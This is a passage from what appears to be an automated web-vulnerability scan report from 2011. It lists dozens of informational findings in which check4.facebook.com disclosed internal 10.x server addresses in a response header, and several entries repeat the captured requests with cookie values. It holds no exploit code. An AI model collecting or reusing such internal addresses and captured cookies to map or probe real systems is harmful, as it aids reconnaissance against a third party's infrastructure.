Pragma: no-cache
X-FB-Server: 10.54.91.63
X-Cnection: close
Date: Thu, 16 Jun 2011 14:55:23 GMT

/*1308236123,171334463*/

window._ip_w["check4"] = 0;

19.81. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.142.56

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3aa7a87a%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb507f9ac%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.142.56
X-Cnection: close
Date: Thu, 16 Jun 2011 13:58:33 GMT

/*1308232713,171347512*/

window._ip_w["check4"] = 0;

19.82. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.50.62

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.50.62
X-Cnection: close
Date: Thu, 16 Jun 2011 12:51:19 GMT

/*1308228679,171323966*/

window._ip_w["check4"] = 0;

19.83. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.17.25

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3a803aa8%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1e06a7d9c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424052702303714704576384051388321740.html%3Fmod%3DWSJ_hp_mostpop_read&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.43.17.25
X-Cnection: close
Date: Thu, 16 Jun 2011 11:22:40 GMT

/*1308223360,170594585*/

window._ip_w["check4"] = 0;

19.84. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.155.42

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.155.42
X-Cnection: close
Date: Thu, 16 Jun 2011 13:48:10 GMT

/*1308232090,171875114*/

window._ip_w["check4"] = 0;

19.85. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.72.47

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df163c489c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff7024fb3%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.72.47
X-Cnection: close
Date: Thu, 16 Jun 2011 12:10:00 GMT

/*1308226200,171329583*/

window._ip_w["check4"] = 0;

19.86. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.206.120

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.136.206.120
X-Cnection: close
Date: Thu, 16 Jun 2011 17:09:46 GMT

/*1308244186,176737912*/

window._ip_w["check4"] = 0;

19.87. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.8.45

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.55.8.45
X-Cnection: close
Date: Thu, 16 Jun 2011 12:46:08 GMT

/*1308228368,171378733*/

window._ip_w["check4"] = 0;

19.88. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.101.34

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd58836c8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d9bc292c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.101.34
X-Cnection: close
Date: Thu, 16 Jun 2011 15:31:35 GMT

/*1308238295,171336994*/

window._ip_w["check4"] = 0;

19.89. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.45.35

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.45.35
X-Cnection: close
Date: Thu, 16 Jun 2011 12:25:28 GMT

/*1308227128,171322659*/

window._ip_w["check4"] = 0;

19.90. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.70.50

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.70.50
X-Cnection: close
Date: Thu, 16 Jun 2011 15:36:39 GMT

/*1308238599,171853362*/

window._ip_w["check4"] = 0;

19.91. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.156.33

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.156.33
X-Cnection: close
Date: Thu, 16 Jun 2011 14:44:59 GMT

/*1308235499,171875361*/

window._ip_w["check4"] = 0;

19.92. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.26.33

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.26.33
X-Cnection: close
Date: Thu, 16 Jun 2011 14:39:50 GMT

/*1308235190,171317793*/

window._ip_w["check4"] = 0;

19.93. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.85.42

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df16aca2c6c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3306de7a4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.85.42
X-Cnection: close
Date: Thu, 16 Jun 2011 15:05:44 GMT

/*1308236744,171332906*/

window._ip_w["check4"] = 0;

19.94. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.54.52

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.54.52
X-Cnection: close
Date: Thu, 16 Jun 2011 17:40:45 GMT

/*1308246045,171324980*/

window._ip_w["check4"] = 0;

19.95. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.206.38

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.206.38
X-Cnection: close
Date: Thu, 16 Jun 2011 17:45:56 GMT

/*1308246356,171363878*/

window._ip_w["check4"] = 0;

19.96. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.69.27

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.69.27
X-Cnection: close
Date: Thu, 16 Jun 2011 12:20:17 GMT

/*1308226817,171328795*/

window._ip_w["check4"] = 0;

19.97. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.37.40

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb4cb576c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25c0fb1fc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.37.40
X-Cnection: close
Date: Thu, 16 Jun 2011 16:38:44 GMT

/*1308242324,171844904*/

window._ip_w["check4"] = 0;

19.98. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.168.119

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1cc2374ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1ed556998%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.136.168.119
X-Cnection: close
Date: Thu, 16 Jun 2011 13:17:19 GMT

/*1308230239,176728183*/

window._ip_w["check4"] = 0;

19.99. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.120.52

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.120.52
X-Cnection: close
Date: Thu, 16 Jun 2011 15:10:50 GMT

/*1308237050,171866164*/

window._ip_w["check4"] = 0;

19.100. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.131.44

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f0119ec8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3685c0bd%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.131.44
X-Cnection: close
Date: Thu, 16 Jun 2011 16:02:32 GMT

/*1308240152,171868972*/

window._ip_w["check4"] = 0;

19.101. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.29.38

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.29.38
X-Cnection: close
Date: Thu, 16 Jun 2011 17:20:08 GMT

/*1308244808,171318566*/

window._ip_w["check4"] = 0;

19.102. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.59.32

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3fc8ffa4c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2e1211308%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.59.32
X-Cnection: close
Date: Thu, 16 Jun 2011 14:29:32 GMT

/*1308234572,171326240*/

window._ip_w["check4"] = 0;

19.103. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.109.55

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.109.55
X-Cnection: close
Date: Thu, 16 Jun 2011 18:17:01 GMT

/*1308248221,171339063*/

window._ip_w["check4"] = 0;

19.104. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.73.37

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.73.37
X-Cnection: close
Date: Thu, 16 Jun 2011 19:19:19 GMT

/*1308251959,171329829*/

window._ip_w["check4"] = 0;

19.105. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.226.112

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.32.226.112
X-Cnection: close
Date: Thu, 16 Jun 2011 15:00:30 GMT

/*1308236430,169927280*/

window._ip_w["check4"] = 0;

19.106. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.133.53

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.133.53
X-Cnection: close
Date: Thu, 16 Jun 2011 12:35:50 GMT

/*1308227750,171345205*/

window._ip_w["check4"] = 0;

19.107. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.221.39

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.221.39
X-Cnection: close
Date: Thu, 16 Jun 2011 16:33:32 GMT

/*1308242012,171892007*/

window._ip_w["check4"] = 0;

19.108. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.61.27

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.61.27
X-Cnection: close
Date: Thu, 16 Jun 2011 12:40:59 GMT

/*1308228059,171326747*/

window._ip_w["check4"] = 0;

19.109. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.51.31

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9f0d99e4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16f176c18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
